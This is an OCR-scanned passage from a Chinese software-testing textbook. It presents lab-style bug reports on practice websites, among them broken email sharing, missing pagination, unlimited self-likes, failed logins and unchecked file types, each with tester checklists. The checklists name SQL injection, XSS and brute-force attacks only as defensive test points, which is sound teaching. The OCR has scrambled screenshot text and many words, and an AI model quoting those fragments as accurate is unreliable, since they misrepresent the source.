测试 人 员 也 需要 做 各 种 功能 的 交叉 验证 ,有 时 可 能 需要 先 准备 许多 数据 ,才能 测试 更 多 
的 场景 。 例 如 ,测试 分 页 功能 是 否 正常 ,测试 选择 多 种 功能 同时 删除 是 否 工作 等 。 


3.13 实验 #13: leaf520 网 站 无 法 进行 邮箱 分 享 


缺陷 标题 ” 言 若 金 叶 软件 研究 中 心 官网 一 邮箱 分 享 一 无 法 通过 邮件 进行 网 页 分 享 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome. 
测试 步骤 

CD 打开 言 若 金 叶 软件 研究 中 心 官 网 http://leaf520. roqisoft. com, 

(2) 单 击 言 若 金 叶 主页 微 信 公众 号 旁边 的 E-mail 图 标 , 如 图 3-19 所 示 。 


仿 若 金 叶 软 件 研究 中 心 简介 


言 着 全 0 软件 研究 中 (Golden Leaf Software: ) , 成 立 于 2004 年 5 月 , 8 URGES CARIOR. 
忻 研究 型 姐 织 。 致 力 于 网 络 次 件 的 研究 与 开发 ， eee EAEE 

















图 3-19 邮箱 分 享 的 位 置 


(3) 填写 相关 邮件 进行 分 享 。 
期 望 结果 ”能 够 发 送 邮 件 分 享 ,对 方 能 够 接收 到 分 享 内 容 。 
实际 结果 ”无 法 进行 邮件 分 享 ,提示 SMTP 错误 ,如 图 3-20 所 示 。 


w 主页 - Google Chrome 
© leaf520.roqisoft.com/index. php 


通知 ， 
> SMTPMER ! 无 法 连 控 到 SMTP 主 机 ,| 
* ”电子 部 件 发 送 失败 


将 该 链接 发 送 给 朋友 
em 提示 SMTP 错 误 














图 3-20 无 法 通过 邮箱 进行 网 页 分 享 


[va 专家 点 评 


邮件 发 送 是 将 言 车 金 叶 软 件 中 心 官网 主页 链接 分 享 给 朋友 的 一 个 功能 , 单 击 邮 件 图 标 





实验 3 ”软件 功能 测试 训练 SA 


后 出 现 “SMTP 错误 ”, 也 就 是 此 功能 不 工作 。 


一 个 商用 网 站 ,对 于 邮件 发 送 、 短 信 发 送 等 功能 都 要 支持 。 如 果 不 支持 或 功能 不 工作 ， 
则 会 影响 用 户 体 验 。 


3.14 ”实验 #14: oricity 网 站 翻 页 功能 缺 上 一 页 下 一 页 


缺陷 标题 oricity 网 站 一 都 市 论坛 一 无 图 版 一 户外 体验 一 只 有 <<( 首 页 ) 和 >>( 尾 页 ) 
链接 ,没有 上 一 页 、 下 一 页 链接 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 或 Firefox 或 IE 11。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/. 
(2) 单 击 右 上 角 的 “都 市 论坛 ”, 在 都 市 论坛 页 面 单 击 “ 无 图 版 ”。 
(3) 单 击 * 户 外 体验 ”。 
OD 单 击 >> 按 钮 。 
期 望 结果 ” 跳 转 到 第 3 页 ,页 面 有 < 按钮 ,可 以 跳 转 到 上 一 页 。 
实际 结果 ”直接 跳 转 到 了 第 3 页 ,但 没有 链接 上 一 页 或 者 下 一 页 的 相应 按钮 ,如 图 3-21 
所 示 。 


wwordiycom/implofndexphpr13 G R > Cj 图 - sr cs p| Y& @ @ @ + +í > 
局 RAR L) hadoop L) ADIRE L) flex L) php L) MAIE L) UI L) andriod L) SEZ L) thinkphp |.) 特效 网 页 Ld 网 站 模板 








城市 空间 论坛 -> 户外 体验 登录 -> 注册 -> 发 表 主 题 




















<<123 >> Pages: (3total) 


201. 揭 开 面纱 的 一 角 一 吐 准 香 (4 FE) 

202. Hiking in Rancho San Antonio, Los Altos CA (4 回复 ) 
203. Pace rol Park (GBR) 

204. 另 一 种 回味 (7 EJE 

205. 9620071103 “° Fg) 





| 也 的 使 用 《 转 ) (4 回复 ) 
210.8558 GS ME) 
Poi HSR- 骑 行 徒步 ， 穿 楼 古老 与 时 尚 GSIR) 
12. 
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图 3-21 上 一 页 、 下 一 页 功能 没有 实现 
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L. 专家 点 评 


在 此 页 面 元 素 中 ,只 有 <<( 首 页 ) 和 >>( 尾 页 ) 链 接 , 没 有 上 一 页 、 下 一 页 链接 。 在 页 数 很 
多 的 情况 下 ,上 一 页 和 下 一 页 的 功能 需求 会 非常 大 ,这 里 只 有 3 页 ,还 体现 不 出 来 。 

开发 人 员 在 设计 时 ,可 能 是 忘记 实现 上 一 页 、 下 一 页 功能 ,也 可 能 觉得 只 需要 有 首页 和 
尾 页 以 及 每 页 的 列表 即 可 ,不 用 再 设计 逐 页 翻 的 功能 。 但 是 ,从 用 户 体验 方面 考虑 ,在 页 数 
量 很 大 的 情况 下 ,此 功能 的 实现 还 是 非常 重要 的 。 

翻 页 功能 一 般 包 括 以 下 几 项 。 

(OD 首页 、 上 一 页 、 下 一 页 、 尾 页 。 

(2) 总 页 数 和 当前 页 数 。 

(3) 指定 跳 转 页 。 

(4) 指定 每 页 显示 条 数 。 

在 测试 翻 页 功能 时 , 常 需要 注意 以 下 几 点 。 

(1) 翻 页 链接 或 按钮 的 测试 ,主要 检查 的 测试 点 如 下 。 

(D 有 无 数据 时 控件 的 显示 情况 。 

Q) 在 首页 时 ,是 否 能 单 击 首页 和 上 一 页 。 

O 在 尾 页 时 ,是 否 能 单 击 下 一 页 和 尾 页 。 

@ 在 非 首 页 和 非 尾 页 时 ,4 个 按钮 功能 是 否 正 确 。 

© 翻 页 后 ,列表 中 的 记录 是 否 仍 按 照 指定 的 排序 方式 进行 了 排序 。 

(2) 总 页 数 和 当前 页 数 , 主 要 检查 的 测试 点 如 下 。 

(D 总 页 数 是 否 等 于 总 的 记录 数 / 指 定 每 页 条 数 。 

O 当前 页 数 是 否 正确 。 

(3) 指定 跳 转 页 ,主要 检查 的 测试 点 如 下 。 

D 能 否 正常 跳 转 到 指定 的 页 数 。 

@ 输入 的 跳 转 页 数 非 法 时 的 处 理 。 

(4) 指定 每 页 显示 条 数 , 主 要 检查 的 测试 点 如 下 。 

(D 是 否 有 默认 的 指定 每 页 显示 条 数 。 

O 指定 每 页 的 条 数 后 列表 显示 的 记录 数 、 页 数 是 否 正确 。 

QD 输入 的 每 页 条 数 非 法 时 的 处 理 。 

当然 ,有 一 些 网 页 是 少 于 多 少 页 全 部 以 数字 的 形式 显示 ,多 于 多 少 页 后 才 出 现下 一 页 的 
控件 。 


3.15 ”实验 #15: 智慧 绍兴 能 给 自己 无 限 次 点 赞 


缺陷 标题 智慧 绍兴 一 “我 的 空间 ”>“ 积 分 管理 ”中 能 给 自己 无 限 次 点 赞 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome, 
测试 步骤 

(1) 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx。 

(2) 输入 用 户 名 sms, 密 码 test123 ,登录 系统 (也 可 以 自己 注册 账户 登录 ) 。 
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NA 
(3) 在 导航 条 中 选择 “我 的 空间 ”一 “积分 管理 ”。 
(4) 找到 自己 的 账户 ,并 给 自己 点 赞 ,如 图 3-22 所 示 。 





智能 导航 景点 互动 到 此 一 游 RICH 我 的 空间 美景 欣赏 退出 

















积分 管理 
获得 积分 的 途径 的 两 种 
LURER 积分 《每 天 仅 可 积 一 分 ) 
2. 参 加 优秀 作 | * o 100% 70% T 50 积 分 
m rm 总 积分 MAB- 
admin 四 TT 
m wo | Pune. Antea 
cotiochen eon EIER Os TM 
" ^ BH 4 只 和 有 站 人员 。 才 和 有 权限 加 会 与 分 1 
Yy Lid [9] Ll Rir ammi, AARMEN: 
zs es DE á o mu. ott 
u wm PH 。 ， stum. (rator aint 
» SB Žž -à LT 





图 3-22 可 以 给 自己 无 限 次 点 赞 


HAAR 不 能 给 自己 点 赞 。 
实际 结果 ”可 以 给 自己 无 限 次 点 赞 ,持续 点 鞠 后 , 获 赞 数 不 断 增加 。 


多 多 专家 点 评 

对 于 点 赞 功能 ,一 般 来 说 需要 别人 了 既 能 为 你 点 鞠 , 也 能 取消 点 更 ; 但 是 本 人 不 能 给 自己 
点 鞠 , 或 者 至 少 不 能 给 自己 无 限 次 点 鞠 , 否 则 就 会 有 作 苏 嫌疑 。 

对 于 点 鞠 功 能 ,一 般 常 要 考虑 的 验证 点 如 下 。 

CD 是 否 可 以 正常 点 玩 和 取消 。 

(2) 点 玩 的 人 是 否 在 可 见 分 组 里 。 

(3) 点 次 状 态 能 否 及 时 更 新 显示 。 

(4) 共同 好 友 是 否 可 见 点 现状 态 。 

(5) 不 同 手机 ,系统 显示 界面 如 何 。 

(6) 性 能 检测 ,网 速 快 慢 对 其 影响 。 

(7) 点 装 显 示 是 否 正确 ,一 行 几 个 。 

(D 点 玩 是 否 按时 间 进 行 排序 ,头像 对 应 是 否 正确 。 

(9) 能 否 在 消息 列表 中 显示 点 先 人 的 上 昵称、 备注 。 

(10) 可 扩展 性 测试 ,点 先后 能 否 发 表 评 论 。 

(11) 能 否 在 未 登录 时 查看 被 点 鞠 的 信息 。 
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3.16 实验 # 16: testaspnet 网 站 已 注册 账户 无 法 登录 


缺陷 标题 “testaspnet 网 站 成 功 注册 账户 无 法 登录 网 站 。 
测试 平台 与 浏览 器 ”Windows 7 十 Firefox。 
测试 步骤 


(1) 打开 testaspnet 网 站 主页 http: //testaspnet. vulnweb. com/ 。 
(2) 单 击 signup ,成 功 注 册 一 个 账户 ,如 图 3-23 所 示 ,然后 尝试 登录 。 





É| @ testaspnetvulnwebcom/Signupasp W BR - C | 图- 5z- P Yr B # % - ë @ +4 > 三 
Lj RAMi L) hadoop L) 网 页 保存 L) flex L) php L MAES L UI Lj andriod |.) AEZ L thinkphp L 特效 网 页 | 当 网 站 模板 |J 


























Sign me up 
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Get RSS feed 














图 3-23 注册 账户 
HAAR 登录 成 功 。 
实际 结果 ”登录 后 回 到 登录 页 面 ,没有 任何 提示 ,如 图 3-24 所 示 。 


x wasis 


既然 提示 账户 创建 成 功 ,就 应 该 能 成 功 登录 ,如 果 登 录 不 了 ,也 应 该 提示 登录 不 成 功 的 
原因 ,但 是 此 例 没有 任何 提示 却 登 录 不 成 功 ,这 可 能 是 因为 登录 功能 不 起 作用 或 者 注册 成 功 


的 页 面 是 假 的 。 
对 于 登录 测试 ,一 般 需 要 考虑 如 下 几 点 。 
1. 基本 功能 测试 点 
(1) 输入 正确 的 用 户 名 和 密码 时 登录 成 功 。 


实验 3 软件 功能 测试 训练 “、85 
Ë 


* | @ testaspnet vulnweb com/login aspx gre 图 EZP Y 6 f $ - ë 9 + > 


L RAMi L) hadoop L) 网 页 保存 |.) flex |.) php _ BABE _ UI L) andriod |.) SEZ L thinkphp |.) 特效 网 页 | 了 网 站 模版 





























使 用 注册 成 功 的 账户 和 密码 登录 后 再 回 到 登录 界面 























图 3-24 使 用 注册 成 功 的 账户 和 密码 登录 失败 


(2) 输入 错误 的 用 户 名 和 密码 时 登录 失败 。 

(3) 用 户 名 或 密码 都 错误 时 是 否 有 相应 提示 。 

(4) 用 户 名 或 密码 为 空 时 是 否 有 相应 提示 。 

(5) 如 果 用 户 未 注册 ,提示 请 先 注 册 , 然 后 登录 。 

(6) 已 经 注销 的 用 户 登 录 失 败 , 提 示 信 息 是 否 友好 。 

(7) 密码 框 是 否 加 密 显示 。 

(8) 用 户 名 是 否 支 持 中 文 特殊 字符 。 

(9) 用 户 名 是 否 有 长 度 限制 。 

(10) 密码 是 否 支 持 中 文 和 特殊 字符 。 

(11) 密码 是 否 有 长 度 限 制 。 

02) 密码 是 否 区 分 大 小 写 。 

(13) 密码 为 一 些 简单 常用 字符 串 ( 如 123456) 时 ,是 否 提示 修改 。 
(14) 密码 存储 方式 是 否 加 密 。 

(15) 登录 功能 是 否 需要 输入 验证 码 。 如 果 是 ,需要 继续 测试 验证 码 , 如 下 所 示 。 
(D 验证 码 有 效 时 间 。 

© 验证 码 输 入 错误 ,登录 失败 ,提示 信息 是 否 友 好 。 

@ 输入 过 期 的 验证 能 否 登 录 成 功 。 

(D 验证 码 是 否 容易 识别 。 
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© 更 换 验 证 码 功能 是 否 可 用 , 单 击 验证 码 图 片 是 否 可 以 更 换 验 证 码 。 

(16) 用 户 权 限 。 比 如 系统 分 普通 用 户 、 高 级 用 户 ,不 同 用 户 登 录 系统 后 的 权限 不 同 。 

(17) 如 果 使 用 第 三 方 账户 (QQ、 微 博 账户 ) 登 录 , 那 么 第 三 方 账户 与 本 系统 的 账户 体系 
对 应 关系 如 何 保存 ,首次 登录 需要 授权 确认 等 。 

2. 页 面 测试 

(1) 登录 页 面 显示 是 否 正 常 ; 文字 和 图 片 能 否 正常 显示 ,相应 的 提示 信息 是 否 正确 , 按 
钮 的 设置 和 排列 是 否 正常 ,页 面 是 否 简洁 等 。 

(2) 页 面 默认 焦点 是 否定 位 在 用 户 名 的 输入 框 中 。 

(3) 首次 登录 时 相应 的 输入 框 是 否 为 空 ; 或 者 如 果 有 默认 文本 , 当 单 击 输入 框 时 默认 
文本 是 否 消失 。 

(4) 相应 的 按钮 (如 登录 、 重 置 等 ) 是 否 可 用 ; 页 面 的 前 进 、 后 退 、 刷 新 按钮 是 否 可 用 。 

(5) 快捷 键 Tab,Esc,Enter 等 能 否 控制 使 用 。 

(6) 兼容 性 测试 : 不 同 浏览 器 不 同 操作 系统 、 不 同 分 辨 率 下 界面 是 否 正 常 。 

3. 安全 测试 

(1) 不 登录 : 浏览 器 中 直接 输入 登录 后 的 地 址 ,看 是 否 可 以 直接 进入 。 

(2) 登录 成 功 后 生成 的 Cookie 是 否 httponly (否则 容易 被 脚本 盗 取 ) 。 

(3) 用 户 名 和 密码 是 否 通过 加 密 的 方式 发 送 给 Web 服务 器 。 

(4) 用 户 名 和 密码 的 验证 应 该 是 用 服务 器 端 验证 ,而 不 能 仅 在 客户 端 用 JavaScript 


(5) 用 户 名 和 密码 的 输入 框 应 该 屏蔽 SQL 注入 攻击 。 

(6) 用 户 名 和 密码 的 输入 框 应 该 禁止 输入 脚本 (防止 XSS 攻击 ) 。 

(7) 错误 登录 的 次 数 限制 (防止 暴力 破解 ) 。 

(8) 是 否 支持 多 用 户 在 同一 机 器 上 登录 。 

(9) 是 否 支持 一 用 户 在 多 台 机 器 上 登录 。 

4. 性 能 测试 

OD Eh: 大 量 并 发 用 户 登 录 时 系统 的 响应 时 间 是 多 少 ; 系统 是 否 会 出 现 死机 、 内 存 泄 
i CPU 饱和 、 无 法 登录 。 

(2) 稳定 性 : 系统 能 否 处 理 并 发 用 户 数 在 临界 点 以 内 连续 登录 多 个 用 户 时 的 场景 。 

5. 其 他 测试 

(1) 连续 输入 3 次 或 3 次 以 上 错误 密码 ,用 户 是 否 被 锁 一 定时 间 ( 如 15min); 是 否 该 时 
间 内 不 允许 登录 ,超出 时 间 后 可 以 继续 登录 。 

(2) M È session 过 期 后 ,重新 登录 能 否 重新 返回 之 前 session 过 期 的 页 面 。 

G) 用 户 名 和 密码 输入 框 是 否 支持 键盘 快捷 键 (如 撤销 、 复 制 、 粘 贴 等 )。 

(4) 是 否 允许 同名 用 户 同 时 登录 进行 操作 (考虑 Web 和 APP 同时 登录 )。 

(5) 手机 登录 时 ,是 否 先 判断 网 络 可 用 。 

(6) 手机 登录 时 ,是 否 先 判 断 APP 存在 新 版 本 。 

(7) 是 否 支持 单 点 登录 SSO. 
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3.17. 实验 #17:“ 言 若 金 叶 ?公众 号 使 用 攻略 功能 问题 


缺陷 标题 ” 单 击 查看 “与 你 共 舞 ”中 的 "使 用 攻略 ”, 输 入 关键 字 没有 弹出 相应 信息 
测试 手机 与 版 本 号 ”苹果 5 十 9. 3.3。 
测试 步骤 
(1) 进入 言 若 金 叶 官网 http://leaf520. rogisoft. com, 手 机 扫描 并 关注 “ 言 车 金 叶 ” 公 
众 号 。 
(2) 点 击 “ 与 你 共 舞 "中 的 “使 用 攻略 ”, 然 后 阅读 全 文 ,如 图 3-25 所 示 。 
(3) 按 使 用 攻略 中 的 技巧 说 明 ,发 送 关 键 字 2017jsbm。 
期 望 结果 ”弹出 相应 的 信息 
















言 息 ,如 图 3-26 所 示 。 





5. 全 国 大 学 生 软 件 实践 能 力 
大 赛 一 官网 : http://colle 


gecontest.roqisoft.com Q 


进入 言 若 金 叶 公众 号 ， 点 击 左边 键盘 样式 
的 按键 ， 输 入 以 下 关键 词 ， 并 提交 。 


想 看 中 心 官网 请 输入 : 言 若 金 叶 

想 参加 中 心 工程 师 认证 : 认证 

参加 工程 师 培 训 或 高 校 师资 培训 : 培训 
参加 大 学 生 软件 实践 能 力 大 赛 : AGE 
查看 中 心 已 出 版 计算 机 








mem | 


p. 言 若 金 叶 软件 研究 中 心 - 
2015 全 国 大 学 生 软 件 实践 与 
创新 能 力 大 赛 获奖 名 单 ， 请 
访问 : http://collegeconte 
st.roqisoft.com/2015/201 
5_winnerannounce.html 





告 看 2015 大 学 生 竞赛 获奖 : 2015jshj 
“Pas st 


[TYTITTTU 
sain 


QQ: 470701012 
微 信号 : roywangshun 





阅读 35 5 投诉 = 0 =+ 

















图 3-25 攻略 给 出 的 功能 图 3-26 输入 指令 没有 返回 相应 的 信息 


DS 专家 点 评 


本 例 说 明 后 台数 据 没有 及 时 维护 与 更 新 。 架 构 一 个 网 站 或 公众 号 很 方便 ,但 只 有 不 断 
地 维护 更 新 ,才能 给 用 户 更 多 的 体验 。 

微 信 公 众 号 测试 需要 注意 以 下 几 点 。 

1. 基础 功能 点 

COD 是 否 可 以 正常 地 关注 和 取消 关注 。 

(2) 保证 自己 提供 的 二 维 码 能 够 被 用 户 识别 ,扫描 后 即 可 关注 。 

(3) 用 户 回 复 关 键 字 能 否 得 到 正确 的 回复 。 
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(4) 用 户 是 否 可 以 查看 往 期 文章 、 历 史 信息 。 

(5) 群发 用 户 是 否 可 以 收 到 信息 。 

2. 拓展 功能 点 (涉及 微 站 类 型 ) 

(1) 测试 基础 功能 : 如 登录 、 注 册 、 支 付 、 注 册 发 送 的 验证 码 是 否 可 以 用 等 ,这 些 和 测试 
网 站 的 形式 是 一 样 的 。 

(2) 测试 性 能 : 有 时 一 些微 站 要 进行 一 些 秒杀 活动 ,此 时 要 进行 性 能 测试 ,以 保证 请 求 
API 接口 不 崩溃 。 

(3) 测试 数据 库 : 测试 之 后 要 检测 数据 库 , 是 否 数据 都 已 正常 入 库 或 者 进行 修改 。 

(4) 测试 界面 上 的 数据 信息 : 进行 一 些 操 作 之 后 ,就 要 去 看 看 是 否 界 面 的 信息 已 实时 更 新 。 

C5) 界面 检查 : 有 时 在 不 同 的 手机 可 能 会 有 不 同 的 展示 ,这 时 需要 检查 图 片 的 自 适 应 
以 及 JavaScript 的 一 些 动态 效果 。 


3.18 ”实验 #18:“ 言 若 金 叶 ” 公 众 号 读者 专区 和 最 新 动态 
呈现 内 容 有 误 


缺陷 标题 “ 言 若 金 叶 ” 微 信 公 众 号 中 读者 专区 和 最 新 动态 所 呈现 的 内 容 与 工程 师 认 证 
呈现 的 内 容 相同 。 
测试 平台 与 微 信 版 本 Android 6.0 十 微 信 6. 5.7。 
测试 步骤 
D 打开 “ 言 车 金 叶 ” 公 众 号 。 
(2) 点 击 “ 言 车 金 叶 ”中 的 “工程 师 认 证 ”, 查 看 其 内 容 , 如 图 3-27 所 示 。 
(3) 点 击 “ 我 心 飞扬 ”中 的 “读者 专区 ”和 “最 新 动态 ”, 查 看 其 内 容 , 如 图 3-28 HR 





查看 全 文 
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和 

} s 

; ITTLZUTESTUET 

A EOED CH n4 BEL AKTE TLF 
中 心 官 网 


精品 专著 





工程 师 培 训 


t F 资源 下 载 
大 学 生 竞赛 


2i waex [asus] 
工程 师 认证 最 新 动态 


[m] StH ë 我 心 飞扬 与 你 共 舞 ASAH ë 我 心 飞 扬 。。 与 你 共 舞 


























图 3-27 点 击 “ 工 程 师 认 证 ” 图 3-28 点 击 “ 读 者 专区 ”和 “最 新 动态 ” 


实验 3 ”软件 功能 测试 训练 


HAAR 三 者 呈现 的 内 容 应 该 有 所 不 同 。 
实际 结果 ”三 者 呈现 的 内 容 都 为 工程 师 认 证 。 


DS 专家 点 评 


微 信 公众 号 中 点 击 不 同 菜单 显示 同一 内 容 , 说 明 菜 单 的 链接 有 误 。 这 说 明 做 好 微 信 公 
众 号 后 ,没有 做 好 每 个 菜单 的 点 击 验证 测试 ,只 看 有 返回 , 没 看 与 实际 内 容 是 否 相符 。 

这 也 提醒 测试 工程 师 , 在 做 功能 测试 时 一 定 要 仔细 核对 ,不 能 简单 认为 有 返回 就 是 对 
的 ,还 要 看 返回 的 内 容 是 否 符合 当前 的 场景 。 


3.19 实验 # 19: oricity 网 站 “版 权 所 有 ”功能 错误 


缺陷 标题 oricity 网 站 “版 权 所 有 "链接 错误 。 
测试 平台 与 浏览 器 ”Windows 7 十 Firefox 或 IE 10。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/ , 
(2) 单 击 页 面 底部 的 “版 权 所 有 ”, 如 图 3-29 所 示 。 
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3-29 “版 权 所 有 ”的 链接 为 城市 空间 主页 


期 望 结果 ”显示 有 关 版 权 页 面 。 
实际 结果 跳 转 到 oricity 主页 。 
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DO 专家 点 评 

单 击 “版 权 所 有 ?链接 以 后 ,出 现 的 页 面 应 该 是 有 关 版 权 说 明 的 ,但 这 里 直接 跳 转 到 
oricity 主页 ,是 链接 指向 错误 。 

常见 的 “版 权 所 有 ”链接 指向 的 网 页 ,一 般 包 括 类 似 于 以 下 信息 。 

(1) XX 网 拥有 网 站 内 的 所 有 信息 内 容 ( 包 括 但 不 限于 文字 、 图 片 、 软 件 、 音 频 、 视 频 ) 的 
著作 权 。 

(2) 久久 网 的 所 有 产品 、 技 术 与 所 有 程序 ,或 与 合作 公司 共同 发 行 的 但 不 限于 产品 或 服 
务 的 全 部 内 容 的 版 权 等 均 属于 XX 网 的 知识 产权 , 受 法 律 保护 。 

(3) 未 经 X 兴 网 书面 许可 ,任何 单位 及 个 人 不 得 以 任何 方式 或 理由 对 上 述 产品 服务 、 
信息 、 材 料 的 任何 部 分 用 于 商业 目的 , 且 所 有 信息 内 容 及 其 任何 部 分 的 使 用 都 必须 包括 此 版 
权 上 声明 ; 已 经 书面 授权 的 ,应 在 授权 范围 内 使 用 ,并 注 明 "来 源 : X< Xx W”, 

(4) 凡 侵 犯 X 义 网 版 权 等 知识 产权 的 ,XX 网 将 依法 追究 其 法 律 责任 。 


3.20 ”实验 #20: NBA 网 站 缩小 浏览 器 导航 条 功能 消失 


缺陷 标题 ”英文 网 站 缩小 浏览 器 窗口 导航 条 消失 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox。 
测试 步骤 
(1) 打开 NBA 网 站 http://www. nba. com/celtics/ ,如 图 3-30 所 示 。 


CELTICS 


^ BOSTON 





BOS84 @ MIA 100 
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图 3-30 ”导航 条 正常 显示 图 


(2) 缩小 浏览 器 窗口 ,观察 页 面 元 素 变化 。 
期 望 结果 页面 元 素 正常 显示 。 
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实际 结果 页面 的 导航 条 消失 ,如 图 3-31 所 示 。 
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图 3-31 缩小 页 面 导航 条 消失 


DS 专 家 点 评 


页 面 所 有 元 素 应 该 随 浏览 器 的 改变 而 等 比例 变化 ,本 实验 中 在 页 面 缩小 以 后 页 面 元 素 
就 消失 不 见 的 情况 是 个 Bug。 测 试 时 也 要 做 产品 的 兼容 性 测试 ,以 保证 不 管用 户 使 用 什么 
工具 ,产品 展现 出 来 的 形态 都 是 一 样 的 。 否 则 ,菜单 中 所 有 的 功能 ,用 户 都 无 法 正常 使 用 。 


拓展 训练 


找 出 以 下 网 站 的 功能 缺陷 

COD 智慧 绍兴 主 站 : http://www. rogisoft. com/zhsx。 

(2) 智慧 绍兴 系列 -智能 导航 : http://www. rogisoft. com/zhsx/zndh, 

(3) 智慧 绍兴 系列 -景点 互动 : http://www. rogisoft. com/zhsx/jdhd。 

CD 智慧 绍兴 系列 -到 此 一 游 电子 刻字 : http://www. rogisoft. com/zhsx/dcyy。 
(5) 智慧 绍兴 系列 -景区 特产 优惠 购 : http://www. roqisoft. com/zhsx/jatc. 
(6) 智慧 绍兴 系列 -旅游 博客 日 志 : http://www. roqisoft. com/zhsx/blog. 


提醒 : 可 以 在 http://collegecontest. roqisoft. com/awardshow. html 中 查阅 历年 全 国 
高 校 大 学 生 在 这 些 网 站 中 发 现 的 更 多 功能 相关 的 缺陷 
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读书 笔记 
A A; ed; eq; ^4; e; ed: «€; ed: eq; ed; un; ed? e@; 


读书 笔记 Name: Date: 








励志 名 和 名: By reading we enrich the mind ; by conversation we polish it. 





读书 可 以 使 我 们 的 思想 充实 ,谈话 使 其 更 至 完美 。 
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软件 技术 测试 训练 找到 的 产品 缺陷 一 般 都 明显 区 别 于 普通 的 界 
面 测试 (界面 不 美观 ) 、 功 能 测试 (链接 不 工作 ) ,而 是 找到 设计 的 缺陷 、 
内 在 的 逻辑 错误 等 。 技 术 测 试 需要 测试 人 员 花 费 一 定时 间 、 运 用 积累 
的 经 验 、 做 必要 的 技术 分 析 才 能 找到 缺陷 ,这 类 缺陷 通常 在 国际 软件 
测试 中 划 入 技术 类 型 的 问题 。 

软件 测试 工程 师 需 要 不 断 跟踪 软件 领域 的 前 沿 知 识 ,提升 专业 技 
术 水 平 。 通 过 本 实验 的 技术 测试 训练 ,读者 能 切身 感受 到 某 些 软件 缺 
陷 是 深层 次 的 ,可 以 提升 产品 质量 意识 ,开阔 眼界 ,进一步 提高 自身 的 
水 平 。 

注意 : 本 实验 可 能 有 些 缺 陷 , 读 者 认为 可 以 归 到 安全 测试 或 功能 
测试 。 的 确 ,安全 缺陷 或 功能 缺陷 中 ,许多 Bug 的 发 现 都 需要 很 强 的 
专业 知识 才能 发 现 ,所 以 有 的 Bug 可 以 隶属 于 多 个 分 类 。 


4.1 实验 #1: oricity 网 站 轨迹 名 采用 不 同 
从 证 规则 


缺陷 标题 oricity 网 站 上 传 轨迹 和 编辑 线路 时 ,轨迹 名 称 采用 了 
不 同 的 验证 规则 。 
测试 平台 与 浏览 器 ”Windows 7 十 IE 9 或 Chrome 32. 0, 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/. 
(2) 登录 , 单 击 “ 户 外 轨迹”, 再 单 击 * 上 传 轨迹 ”。 
(3) 按 要 求 填写 内 容 , 单 击 * 上 传 轨迹 ”按钮 (如 果 不 填写 轨迹 
名 称 , 将 不 能 保存 ,如 图 4-1 所 示 )。 
(4) 上 传 成 功 后 单 击 * 返 回 列表 ?进入 上 传 的 轨迹 帖子 ; 单 击 
“编辑 线路 "按钮 ,将 路 线 名 称 置 为 空 并 存盘 。 
(5) 查看 保存 结果 页 面 。 
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es Ee G- o0) 
图 4-1 上 传 轨迹 时 提示 轨迹 名 称 不 能 为 空 

期 望 结果 ”保存 失败 ,提示 轨迹 名 称 不 能 为 空 。 

实际 结果 ”保存 成 功 且 轨迹 名 称 为 空 , 如 图 4-2 所 示 。 





* > G 0 weworicitycom/recpisybs 




















图 4-2 编辑 线路 时 将 轨迹 名 称 设 为 空 保存 成 功 


x 专家 点 评 


这 是 典型 的 输入 有 效 性 规则 校 验 问题 。 本 例 在 创建 的 时 候 有 检验 控制 ,避免 了 不 符合 
预期 ; 但 是 修改 时 忘记 使 用 同样 的 方法 去 校 验 ,就 出 现 了 这 样 的 问题 。 

类 似 这 样 的 缺陷 场景 有 许多 : 

(1) 创建 用 户 时 ,要 求 密码 至 少 8 位 ,并 且 不 能 全 是 数字 ; 但 是 创建 完成 后 ,用 户 修改 密 
码 时 可 以 把 密码 改 成 只 有 一 位 数字 。 


实验 4 ”软件 技术 测试 训练 


(2) 创建 相册 时 ,要 求 相册 名 不 能 为 空 ; 但 是 创建 成 功 后 ,修改 相册 名 可 以 设 为 空 。 

对 于 这 样 的 验证 ,除了 创建 与 修改 时 验证 规则 要 保持 一 致 外 ,同一 个 系统 不 同 页 面 中 出 
现 的 同一 个 元 素 的 验证 也 要 相同 。 

例如 ,对 于 电子 邮件 地 址 的 合法 性 判断 ,通常 在 不 同 模块 由 不 同 的 验证 方法 去 判断 , 导 
致 在 一 个 页 面 能 注册 成 功 ,到 另 一 个 页 面 又 提醒 这 是 非法 邮箱 。 

另外 ,对 于 规则 的 验证 ,不 仅 要 做 简单 的 JavaScript 客户 端 校 验 , 还 要 做 相同 的 服务 器 
端 校 验 ,因为 客户 端的 JavaScript 校 验 是 可 以 被 工具 绕 行 的 ,攻击 者 自 改 数据 后 ,就 可 以 直 
接 往 服务 器 端 发 送 请 求 ,提交 后 台数 据 库 。 只 有 服务 器 端的 校 验 才 能 真正 保证 数据 符合 预 
定 规则 。 在 更 新 数据 库 前 进行 服务 器 端的 审查 ,只 有 通过 审查 才能 保存 ,这 样 就 杜绝 了 攻击 
者 利用 客户 端 脆弱 的 输入 有 效 性 验证 进行 各 种 攻击 。 


4.2 实验 #2: 智慧 绍兴 -电子 刻字 不 限制 文件 类 型 


缺陷 标题 智慧 绍兴 一 电子 刻字 无 法 正确 区 分 文件 类 型 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Firefox。 
测试 步骤 
(1) 打开 智慧 绍兴 一 到 此 一 游 电子 刻字 网 页 http://www. rogisoft. com/zhsx/dcyy。 
(2) 单 击 “ 电 子 刻字 ”。 
G) 单 击 “ 体 验 电子 刻字 ”。 
CA) 在 该 页 面 * 选 择 图 片 ”处 选择 文件 。 
(5) 选择 一 个 MP3 格式 的 文件 类 型 。 
期 望 结果 “提示 选择 文件 类 型 错误 。 
实际 结果 ”能够 正常 添加 该 MP3 文件 ,并 且 能 够 实现 文字 方向 的 调整 ,如 图 4-3 所 示 。 


智慧 绍兴 -电子 刻字 

修改 革 一 行 待 刻 文 字 ， sms 文件 类 型 为 MP3 
修改 第 二 行 待 刻 文字 : core mon i 

选择 字体 : ot c 选择 字号 o. AO: no - 





t 仍 能 够 调整 文字 方向 














图 4-3 无 法 正确 区 分 文件 类 型 
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专家 点 评 


